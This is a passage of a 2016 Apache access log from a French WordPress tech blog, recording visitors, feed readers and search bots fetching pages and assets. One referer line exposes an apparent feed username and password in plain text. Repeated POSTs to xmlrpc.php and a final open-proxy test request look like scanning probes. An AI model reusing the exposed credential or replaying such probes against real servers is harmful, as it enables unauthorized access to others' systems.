\"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n199.16.156.126 - - [07/Feb/2016:10:48:46 -0800] \"GET /robots.txt HTTP/1.1\" 200 367 \"-\" \"Twitterbot/1.0\"\n78.226.100.156 - - [07/Feb/2016:10:48:47 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1\"\n199.16.156.126 - - [07/Feb/2016:10:48:47 -0800] \"GET /post/104056058258/les-geeks-les-vengeurs-masques-du-21eme-siecle HTTP/1.1\" 301 310 \"-\" \"Twitterbot/1.0\"\n199.16.156.126 - - [07/Feb/2016:10:48:49 -0800] \"GET /les-geeks-les-vengeurs-masques-du-21eme-siecle HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:08 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15572 \"https://www.google.fr\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:09 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:09 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:10 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:11 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:11 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:11 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n195.81.235.66 - - [07/Feb/2016:10:50:13 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 308 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n207.46.13.30 - - [07/Feb/2016:10:54:37 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n78.248.123.50 - - [07/Feb/2016:10:55:08 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97501 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.248.123.50 - - [07/Feb/2016:10:55:13 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203836 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.210.250.66 - - [07/Feb/2016:11:00:25 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n84.103.122.246 - - [07/Feb/2016:11:01:11 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.103.122.246 - - [07/Feb/2016:11:01:11 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.103.122.246 - - [07/Feb/2016:11:01:12 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.103.122.246 - - [07/Feb/2016:11:01:12 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.103.122.246 - - [07/Feb/2016:11:01:13 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.103.122.246 - - [07/Feb/2016:11:01:14 -0800] \"GET /wp-content/uploads/2014/12/tumblr_inline_nfq2o82z0r1sa6hof-50x50.jpg HTTP/1.1\" 200 2106 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.103.122.246 - - [07/Feb/2016:11:01:18 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 308 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n92.149.162.218 - - [07/Feb/2016:11:01:20 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\"\n92.149.162.218 - - [07/Feb/2016:11:01:20 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 504 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\"\n92.149.162.218 - - [07/Feb/2016:11:01:20 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\"\n92.149.162.218 - - [07/Feb/2016:11:01:21 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 777 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\"\n92.149.162.218 - - [07/Feb/2016:11:01:22 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\"\n92.149.162.218 - - [07/Feb/2016:11:01:22 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\"\n92.149.162.218 - - [07/Feb/2016:11:01:31 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; U; Android 4.1.2; fr-fr; GT-P5110 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\"\n198.58.102.155 - - [07/Feb/2016:11:05:02 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n41.79.217.139 - - [07/Feb/2016:11:05:37 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n41.79.217.139 - - [07/Feb/2016:11:05:37 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n41.79.217.139 - - [07/Feb/2016:11:05:38 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n41.79.217.139 - - [07/Feb/2016:11:05:38 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n41.79.217.139 - - [07/Feb/2016:11:05:38 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5143 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n41.79.217.139 - - [07/Feb/2016:11:05:38 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0\"\n62.210.142.23 - jez [07/Feb/2016:11:06:12 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n62.210.250.66 - - [07/Feb/2016:11:07:36 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n80.12.58.108 - - [07/Feb/2016:11:07:50 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4\"\n80.12.58.108 - - [07/Feb/2016:11:07:50 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4\"\n80.12.58.108 - - [07/Feb/2016:11:07:50 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4\"\n80.12.58.108 - - [07/Feb/2016:11:07:50 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4\"\n80.12.58.108 - - [07/Feb/2016:11:07:50 -0800] \"GET /wp-content/uploads/2014/12/tumblr_inline_ngwo89J1MF1r1bjfi-50x50.jpg HTTP/1.1\" 200 2412 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4\"\n80.12.58.108 - - [07/Feb/2016:11:07:50 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4\"\n69.171.230.98 - - [07/Feb/2016:11:09:13 -0800] \"GET /wp-content/uploads/2014/09/tumblr_inline_ncaeibjep11spe2e1-300x225.jpg HTTP/1.1\" 200 21481 \"-\" \"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\"\n168.63.56.246 - - [07/Feb/2016:11:11:47 -0800] \"GET /feed HTTP/1.1\" 301 474 \"-\" \"Rome Client (http://tinyurl.com/64t5n) Ver: UNKNOWN\"\n68.180.228.42 - - [07/Feb/2016:11:15:23 -0800] \"GET /post/107320013813/marketing-pour-developpeurs-partie-1 HTTP/1.1\" 301 300 \"-\" \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\"\n66.220.156.123 - - [07/Feb/2016:11:16:10 -0800] \"GET /wp-content/uploads/2015/02/3152875867_148b09f57d_z-300x225.jpg HTTP/1.1\" 200 9569 \"-\" \"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\"\n69.171.230.117 - - [07/Feb/2016:11:16:10 -0800] \"GET /wp-content/uploads/2015/03/Mathilde-le-Rouzic-Quaelead-200x300.jpg HTTP/1.1\" 200 16096 \"-\" \"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\"\n50.116.28.209 - - [07/Feb/2016:11:22:27 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n178.255.215.65 - - [07/Feb/2016:11:24:25 -0800] \"GET /marketing-pour-developpeurs-partie-1/feed/ HTTP/1.1\" 200 884 \"-\" \"Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)\"\n98.109.81.194 - - [07/Feb/2016:11:30:58 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; U; Android 4.3; fr-fr; SGH-T999 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n98.109.81.194 - - [07/Feb/2016:11:30:58 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 504 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; U; Android 4.3; fr-fr; SGH-T999 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n98.109.81.194 - - [07/Feb/2016:11:30:58 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33587 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; U; Android 4.3; fr-fr; SGH-T999 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n98.109.81.194 - - [07/Feb/2016:11:31:00 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; U; Android 4.3; fr-fr; SGH-T999 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n98.109.81.194 - - [07/Feb/2016:11:31:00 -0800] \"GET /wp-content/uploads/2014/06/tumblr_inline_n6kfddJqSP1sa6hof-50x50.jpg HTTP/1.1\" 200 2773 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; U; Android 4.3; fr-fr; SGH-T999 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n98.109.81.194 - - [07/Feb/2016:11:31:00 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 664 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (Linux; U; Android 4.3; fr-fr; SGH-T999 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n98.109.81.194 - - [07/Feb/2016:11:31:00 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 15494 \"-\" \"Mozilla/5.0 (Linux; U; Android 4.3; fr-fr; SGH-T999 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\"\n50.116.30.23 - - [07/Feb/2016:11:31:29 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n198.58.103.160 - - [07/Feb/2016:11:40:42 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n192.0.101.203 - - [07/Feb/2016:11:43:00 -0800] \"HEAD /raodath-aminou-la-revolution-du-commerce-est-en/ HTTP/1.0\" 200 342 \"-\" \"WordPress.com; https://entreprendrememepaspeur.wordpress.com\"\n80.215.173.201 - - [07/Feb/2016:11:46:12 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/ HTTP/1.1\" 200 15508 \"https://www.google.fr/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:46:13 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3066 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:46:13 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:46:13 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33587 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:46:15 -0800] \"GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1\" 200 3422 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:46:16 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4483 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:46:23 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 438 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:46:45 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n80.215.173.201 - - [07/Feb/2016:11:47:07 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/?cf_action=sync_comments&post_id=30 HTTP/1.1\" 200 309 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Linux; Android 4.1.2; GT-S6790N Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\"\n108.174.5.117 - - [07/Feb/2016:11:49:01 -0800] \"HEAD /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 448 \"-\" \"LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/3.1 +http://www.linkedin.com)\"\n199.16.156.125 - - [07/Feb/2016:11:53:09 -0800] \"GET /post/104056058258/les-geeks-les-vengeurs-masques-du-21eme-siecle HTTP/1.1\" 301 310 \"-\" \"Twitterbot/1.0\"\n213.245.234.126 - - [07/Feb/2016:11:54:42 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4871 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n213.245.234.126 - - [07/Feb/2016:11:54:54 -0800] \"GET /post/98008044383/trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 301 374 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n213.245.234.126 - - [07/Feb/2016:11:54:56 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n90.14.140.166 - - [07/Feb/2016:11:57:22 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n90.14.140.166 - - [07/Feb/2016:11:57:23 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n90.14.140.166 - - [07/Feb/2016:11:57:23 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n90.14.140.166 - - [07/Feb/2016:11:57:23 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n90.14.140.166 - - [07/Feb/2016:11:57:23 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n90.14.140.166 - - [07/Feb/2016:11:57:25 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n90.14.140.166 - - [07/Feb/2016:11:57:41 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\"\n80.12.42.19 - - [07/Feb/2016:11:59:12 -0800] \"GET /favicon.ico HTTP/1.1\" 200 238 \"-\" \"Reeder/3.0 CFNetwork/758.2.8 Darwin/15.0.0\"\n91.196.50.33 - - [07/Feb/2016:12:02:36 -0800] \"GET http://testp2.czar.bielawa.pl/testproxy.php 